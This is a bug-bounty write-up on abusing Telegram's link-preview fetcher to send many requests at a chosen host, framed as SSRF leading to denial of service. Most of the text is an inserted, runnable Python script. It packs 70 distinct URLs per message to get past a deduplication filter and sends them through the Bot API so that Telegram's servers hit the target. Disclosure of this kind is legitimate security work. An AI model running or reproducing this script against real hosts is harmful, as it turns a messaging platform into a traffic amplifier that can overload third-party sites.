Telegram Report: SSRF leads to DOS attack [Reports that didn't make it]

Summary

Philippe Delteil
Bug Bounty


When a Telegram user (or bot) sends a message containing a URL to another user, the Telegram bot sends a request to check the URL. This is a privacy issue in my view, because URLs and some parts of your conversations are being read by a machine; end-to-end encryption is not enforced in this case. We also detected that if (by mistake) you append text to a URL, that text will be sent to the bot as well.

We discovered this issue when I accidentally sent a Burp Collaborator link to a colleague and received HTTP and DNS interactions in my Collaborator client.

But, besides the privacy concern, what if we could use this behavior to send many requests to a target host?

I used a Python script to send messages to a Telegram bot; every message contained 70 URLs that pointed at the same domain with a different path each. I discovered that a filter did not allow repeated URLs, but I only needed to append something to the end of each one to bypass it.

I’m aware of the size limit on every message and also of the rate limit for sending messages to the bot; around 100 is the upper limit.

Steps To Reproduce

1. Create a Telegram bot.
2. Configure [this tool](https://github.com/MikeWent/notify-send-telegram) to send messages to the bot.
3. Fire up Burp and get a Collaborator payload. (In this example it is ucaao50j385xwc1hc3on5z9w1n7fv4.burpcollaborator.net)
4. Use this script
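The post does not reproduce the script, so the following is an added example (my code, not the author's) of what the steps above describe: it builds messages that each carry many distinct URLs for one target host, with a different path per URL so the deduplication filter mentioned above sees each one as new, and optionally posts them through the Telegram Bot API `sendMessage` method. The 4096-character text limit is Telegram's documented limit for `sendMessage`; the URLs are written as bare host/path without a scheme on the assumption that Telegram still links them (70 full `http://` Collaborator URLs would exceed 4096 characters). The `/pN` path pattern, the `TELEGRAM_BOT_TOKEN` and `TELEGRAM_CHAT_ID` environment variables and the one-second pacing are my choices, not the author's.

```python
"""Build and (optionally) send Telegram messages stuffed with distinct URLs
for one target host. Added example; the original post's script is not shown.
"""
import json
import os
import time
import urllib.parse
import urllib.request

# Collaborator host from the post (step 3).
TARGET_HOST = "ucaao50j385xwc1hc3on5z9w1n7fv4.burpcollaborator.net"
MAX_TEXT_LEN = 4096       # Telegram's documented sendMessage text limit
URLS_PER_MESSAGE = 70     # batch size the post reports using


def build_message(host, start, count, prefix=""):
    """Return one message text holding `count` URLs for `host`.

    Each URL gets a different path (/p0, /p1, ...) so a filter that drops
    repeated URLs treats every entry as new. `prefix` may be "http://" or
    "https://"; the default (bare host, assumed to be linkified by Telegram)
    keeps 70 Collaborator URLs under the 4096-character limit.
    """
    urls = [f"{prefix}{host}/p{i}" for i in range(start, start + count)]
    text = "\n".join(urls)
    if len(text) > MAX_TEXT_LEN:
        raise ValueError(
            f"{len(text)} chars exceeds Telegram's {MAX_TEXT_LEN}-char limit"
        )
    return text


def build_messages(host, total_urls, per_message=URLS_PER_MESSAGE, prefix=""):
    """Split `total_urls` distinct URLs into messages of `per_message` each."""
    messages = []
    for start in range(0, total_urls, per_message):
        count = min(per_message, total_urls - start)
        messages.append(build_message(host, start, count, prefix))
    return messages


def send_message(token, chat_id, text, timeout=10):
    """POST one message via the Bot API sendMessage method; return its JSON.

    Link previews are left at their default (enabled), which is what makes
    Telegram's side fetch the URLs in the first place.
    """
    url = f"https://api.telegram.org/bot{token}/sendMessage"
    data = urllib.parse.urlencode({"chat_id": chat_id, "text": text}).encode()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        return json.load(resp)


def main():
    token = os.environ.get("TELEGRAM_BOT_TOKEN")      # assumed env var names
    chat_id = os.environ.get("TELEGRAM_CHAT_ID")
    msgs = build_messages(TARGET_HOST, total_urls=700)
    url_count = sum(len(m.splitlines()) for m in msgs)
    print(f"built {len(msgs)} messages carrying {url_count} distinct URLs")
    if not (token and chat_id):
        print("set TELEGRAM_BOT_TOKEN and TELEGRAM_CHAT_ID to actually send")
        return
    for i, text in enumerate(msgs, 1):
        reply = send_message(token, chat_id, text)
        print(i, "ok" if reply.get("ok") else reply)
        time.sleep(1)   # crude pacing; the post puts the ceiling near 100 messages


if __name__ == "__main__":
    main()
```

Run it without the environment variables to see how many messages and URLs it would produce; with a bot token and a chat ID set it sends them, and the HTTP and DNS hits show up in the Collaborator client for the host in `TARGET_HOST`.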
